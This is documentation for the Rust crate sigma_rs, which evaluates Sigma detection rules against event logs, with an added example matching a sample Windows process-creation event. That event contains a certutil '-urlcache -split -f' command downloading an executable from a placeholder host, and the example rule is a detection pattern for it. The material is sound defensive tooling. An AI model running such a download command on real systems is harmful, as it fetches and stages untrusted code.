Crate sigma_rs


Functions

  • evaluate a log map against a Sigma rule; the log map is a flat string-to-string map of event fields, for example { "Image": "C:\Windows\system32\certutil.exe", "ParentImage": "C:\WINDOWS\system32\cmd.exe", "ProcessId": "10952", "utc_time": "2023-03-20 17:31:23", "ServerScore": "0", "CommandLine": "certutil \"-urlcache\" \"-split\" \"-f\" \"http://ip/artifact.exe test.exe\"", "ParentCommandLine": "\"C:\WINDOWS\system32\cmd.exe\"", "OriginalFile": "CertUtil.exe.mui", "log_type": "ProcessCreate" }
  • parse a Sigma YAML document into a Sigma rule that can then be evaluated against a log map
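To make the evaluation step concrete, the following is an added, stand-alone example written for this page; it is not the sigma_rs crate's own code and does not call its API (the page lists no function signatures), and it skips the YAML parsing step. It hand-builds the process-creation event shown above as a `HashMap` and evaluates it against a constructed, deliberately reduced Sigma-style rule: a single selection whose field conditions are ANDed, using the `contains|all` modifier with case-insensitive string comparison, as Sigma specifies for string values. A missing field fails closed, which is the behaviour a detection engineer normally wants from a matcher.

```rust
use std::collections::HashMap;

/// One field condition of a Sigma "selection": the field value must contain
/// every listed substring (Sigma's `field|contains|all` modifier). Sigma
/// string matching is case-insensitive, so both sides are lowercased.
#[derive(Debug)]
struct FieldCondition {
    field: &'static str,
    contains_all: Vec<&'static str>,
}

/// Deliberately reduced Sigma rule (assumption for this example): a title and
/// one selection whose conditions are ANDed, i.e. `condition: selection`.
/// Real rules also carry logsource, level, falsepositives and boolean
/// conditions over several selections; those are out of scope here.
#[derive(Debug)]
struct SigmaRule {
    title: &'static str,
    selection: Vec<FieldCondition>,
}

/// Evaluate a log map against a rule. Returns true only when every field
/// condition holds; a field absent from the event makes the rule fail closed.
fn evaluate(rule: &SigmaRule, log: &HashMap<&str, &str>) -> bool {
    rule.selection.iter().all(|cond| match log.get(cond.field) {
        Some(value) => {
            let haystack = value.to_lowercase();
            cond.contains_all
                .iter()
                .all(|needle| haystack.contains(&needle.to_lowercase()))
        }
        None => false,
    })
}

/// The process-creation event from the crate description, rebuilt as a map.
fn sample_log() -> HashMap<&'static str, &'static str> {
    HashMap::from([
        ("Image", "C:\\Windows\\system32\\certutil.exe"),
        ("ParentImage", "C:\\WINDOWS\\system32\\cmd.exe"),
        ("ProcessId", "10952"),
        ("utc_time", "2023-03-20 17:31:23"),
        ("ServerScore", "0"),
        ("CommandLine", "certutil \"-urlcache\" \"-split\" \"-f\" \"http://ip/artifact.exe test.exe\""),
        ("ParentCommandLine", "\"C:\\WINDOWS\\system32\\cmd.exe\""),
        ("OriginalFile", "CertUtil.exe.mui"),
        ("log_type", "ProcessCreate"),
    ])
}

/// Constructed rule (not a published Sigma rule): the image path contains
/// \certutil.exe and the command line carries both -urlcache and -split.
fn certutil_download_rule() -> SigmaRule {
    SigmaRule {
        title: "Certutil download switches in process creation (constructed)",
        selection: vec![
            FieldCondition { field: "Image", contains_all: vec!["\\certutil.exe"] },
            FieldCondition { field: "CommandLine", contains_all: vec!["-urlcache", "-split"] },
        ],
    }
}

/// Does the sample event match the constructed rule?
fn sample_matches() -> bool {
    evaluate(&certutil_download_rule(), &sample_log())
}

fn main() {
    let rule = certutil_download_rule();
    println!("{} -> matched: {}", rule.title, sample_matches());
}
```

Running it prints `matched: true` for the event above; changing `CommandLine` to a benign `certutil -verify` invocation, or dropping the `Image` field, yields `false`, which is the fail-closed behaviour the comment describes.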